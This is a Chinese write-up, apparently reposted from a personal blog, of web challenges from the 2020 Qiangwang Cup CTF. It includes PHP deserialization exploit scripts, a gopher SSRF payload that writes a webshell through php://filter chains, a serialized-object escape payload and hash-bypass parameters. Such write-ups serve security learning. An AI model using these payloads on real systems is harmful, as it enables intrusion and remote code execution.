2. 程式人生 > 實用技巧 >強網杯2020 writeup

強網杯2020 writeup

阿新 發佈:2020-08-24

原文地址:http://phoebe233.cn/?p=242

被二進位制爺爺們帶飛Orz

Web

half_infiltration

首先反序列化,由於print之後無論走哪都會有ob_end_clean(),永遠也不會輸出,所以嘗試輸出之後讓他報錯來繞過

這樣global$$this就會輸出並報錯

傳入兩個User,一個輸出,一個報錯繞過ob_end_clean()

<?php
$flag='flag{aaaa}';
class Pass
{
    function read()
    {
        ob_start();
        global $result;
        print $result;
    }
}
class User
{
    public $age,$sex,$num;
    function __destruct()
    {
        $student = $this->age;
        $boy = $this->sex;
        $a = $this->num;
		$student->$boy();
		
    if(!(is_string($a)) ||!(is_string($boy)) || !(is_object($student)))
    {
        ob_end_clean();
        exit();
    }
    global $$a;
    $result=$GLOBALS['flag'];
        //ob_end_clean();
    }
}
if (isset($_GET['x'])) {
    unserialize($_GET['x']);
} 
$a=new Pass();
$b=new User();
$c=new User();
$c->age=$a;
$c->sex="read";
$c->num="this";
$b->age=$a;
$b->sex="read";
$b->num='result';
echo urlencode(serialize([$b,$c]));

讀到ssrf.php

內網埠探測為40000,內網服務:

原始碼處看到form表單,題目告知有uploads資料夾,猜測是檔案上傳處,發現phpsessid會建立一個資料夾,然後想寫shell時發現有過濾,file這裡可以用二次url繞一些字元,然後大小寫繞base64過濾,content檔案內容也有過濾,還把PD9給ban了,考慮用phpfilter組合過濾器繞

生成gopher打40000埠

gopher://127.0.0.1:40000/_POST%2520/index.php%2520HTTP/1.1%250AHost%253A%2520127.0.0.1%250ACookie%253A%2520PHPSESSID%253Dbv2afbkkbbpgkio8tjmai40ob7%250AContent-Length%253A%2520174%250AContent-Type%253A%2520application/x-www-form-urlencoded%250AConnection%253A%2520close%250d%250A%250Afile%253Dphp%253A//filter/%25252577rite%253Dstring.rot13%257Cconvert.Base64-decode%257Cconvert.iconv.utf-7.utf-8/resource%253D1.php%2526content%253DK0FEdz9waHAgZXZhbCgrQUNRQVh3LUdFVCtBRnMtMCtBRjApK0FEcz8rQUQ0LQ

命令執行需要二次編碼

這過濾也是挺狠

強網先鋒

web輔助

反序列化逃逸,安恆月賽都有類似的題了,沒意思

class player{
    protected $user;
    protected $pass;
    protected $admin;
    public function __construct($user, $pass, $admin = 0){
        $this->user = $user;
        $this->pass = $pass;
        $this->admin = $admin;
    }
    public function get_admin(){
        return $this->admin;
    }
}

class topsolo{
    protected $name;
    public function __construct($name = 'Riven'){
        $this->name = $name;
    }

    public function TP(){
        if (gettype($this->name) === "function" or gettype($this->name) === "object"){
            $name = $this->name;
            $name();
        }
    }
    public function __wakeup(){
        $this->TP();
    }
}
class midsolo{
    protected $name;
    public function __construct($name){
        $this->name = $name;
    }
    public function __wakeup(){
        if ($this->name !== 'Yasuo'){
            $this->name = 'Yasuo';
            echo "No Yasuo! No Soul!\n";
        }
    }
    public function __invoke(){
        $this->Gank();
    }
    public function Gank(){
        if (stristr($this->name, 'Yasuo')){
            echo "Are you orphan?\n";
        }
        else{
            echo "Must Be Yasuo!\n";
        }
    }
}
class jungle{
    protected $name = "";
    public function __construct($name = "Lee Sin"){
        $this->name = $name;
    }
    public function KS(){
        phpinfo();
    }
    public function __toString(){
        $this->KS();  
        return "";  
    }
}
function read($data){
    $data = str_replace('\0*\0', chr(0)."*".chr(0), $data);
    return $data;
}
function write($data){
    $data = str_replace(chr(0)."*".chr(0), '\0*\0', $data);
    return $data;
}
$d=new jungle(NULL);
$c=new midsolo($d);
$b=new topsolo($c);
$payload=(serialize($b));
$a="\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0";
//$username='\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0';
$b='";s:7:"0*0pass";s:0:"";s:8:"0*0admin";'.$payload;
echo $b."\n";
echo read(write(serialize(new player($a,$b))))."\n";

payload

?username=\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0&password=";s:7:"%00*%00pass";s:0:"";s:8:"%00*%00admin";O:7:"topsolo":2:{S:7:"\00*\00\6e\61\6d\65";O:7:"midsolo":1:{S:7:"\00*\00\6e\61\6d\65";O:6:"jungle":1:{S:7:"\00*\00\6e\61\6d\65";N

funhash

?hash1=0e251288019&hash2[]=1&hash3[]=2&hash4=ffifdyop

主動

cat f*

相關推薦

2020 writeup

原文地址:http://phoebe233.cn/?p=242 被二進位制爺爺們帶飛Orz Web half_infiltration 首先反序列化,由於print之後無論走哪都會有ob_end_clean(),永遠也不會輸出,所以嘗試輸出之後讓他報錯來繞過

第五屆WEB Writeup

WEB 0x01 [先鋒]尋寶 根據題目資訊可以知道,需要從中獲取兩個KEY,然後獲得flag

2020第四屆""線上賽部分題解

前言 肝了兩天,日常被虐,這裡記錄一下做出來的幾道題,真*web是一個都沒解出來,感覺還是tcl!!!,還得繼續努力啊

[2020]記錄

除了簽到簽退,只出了3到簽到題(https://shimo.im/docs/QTkJYhjrwq8RQqkJ) 哈哈哈 想著跟大佬們的wp,復現一下miscstudy

[青少年賽] 慘慘戰隊WriteUp

Web easy_php 簡單題,PHP黑魔法梭哈 第一層 a1 a2 弱型別繞過 第二層 b1 b2 陣列繞過 第三層 time 科學計數法繞過

2017年第二屆廣東省線上賽WEB:Musee de X writeup(模板注入漏洞)

目錄解題思路總結 解題思路 拿到手上,有四個頁面 首先按照題目要求執行,嘗試註冊一個名為admin的賬戶

2021廣東省WriteUp

個人賽 網路詐騙 參考 https://github.com/Heyxk/notes/issues/1 先把EnMicroMsg.db提出來 CompatibleInfo.cfg是0kb,用第一種方法

[ 2019]隨便注 1 【BUUCFT】【SQL注入】

參考教程: 簡簡的我 方法一 判斷是否存在注入,注入是字元型還是數字型 輸入 1’ 發現不回顯

第三屆一道web題(upload)詳解

一拿到題目開啟就是一個登入註冊頁面, 順手先測了下有沒有sql注入,發現沒有後註冊了一個,登入

十三屆全國大學生資訊大賽++DASCTF八月V&N出題賽-刷題筆記

菜鳥的自白: 剛開始我還不知道什麼是CTF到了大學,有學長帶起,慢慢的步入這個信安大世界,我從基礎小白,到現在入門小菜鳥,我覺得學習CTF,可以鍛鍊自己寫指令碼,看bug,學滲透,不斷的充實自己,這次這3個比

細說Web輔助

本文首發於“合天智匯”公眾號 作者:Ch3ng 這裡就藉由的一道題目“Web輔助”,來講講從構造POP鏈,字串逃逸到最後獲取flag的過程

BUUCTF-[ 2019]隨便注

解題 1、網頁標題是easy_sql 輸入1、2有回顯,其餘都無查詢結果 加單引號?inject=1\' 報錯

CTF-i春秋-Web-cookie欺騙、陣列繞過正則過濾、rot13-who are you?-2017第二屆廣東省線上賽

2020.09.21 經驗教訓 rot13,凱撒密碼的一種變形,因為其加密和解密只用一種方法,所以比較流行,實質就是字母表偏移13位

buuctf-web [ 2019]隨便注 1

啟動靶機,開啟是這個介面 首先輸入1‘,它會報錯 然後輸入1\' order by 2,這說明只有兩個欄位。

CTF[2019 ]隨便注.

照例and or測試一下 發現表裡所有資料,但沒有flag 嘗試一下堆疊注入 可以用堆疊注入,接著看錶

[ 2019]隨便注

這是BUUCTF上刷的第一道題,題目看是SQL注入 1.根據經驗嘗試有無常規注入 1.1 探測有無注入

2021 [先鋒]賭徒

2021 [先鋒]賭徒 考點: 構造pop鏈 進去就一句話 I think you need /etc/hint . Before this you need to see the source code

2021qwb [先鋒]賭徒 Writeup + 環境復現

2021 qwb [先鋒]賭徒 Writeup + 環境復現(win10) 1、本地環境復現(win10+phpStudy2018)

2021 [先鋒]尋寶

2021 [先鋒]尋寶 考點:1. php原始碼審計2. 指令碼的編寫 給了我們兩個資訊,分邊對應2個KEY,得到2個KEY後就可以獲得flag了

2021-賭徒-pop鏈的構造

知識點 pop鏈的構造 前言 第一次在比賽裡做出題!!!好激動哈哈哈 [賭徒]是現學現做的一道php反序列化web題,之前對反序列化漏洞的瞭解只停留在繞過__wakeup魔法方法,和群裡的大佬交流發現原來pwn也有。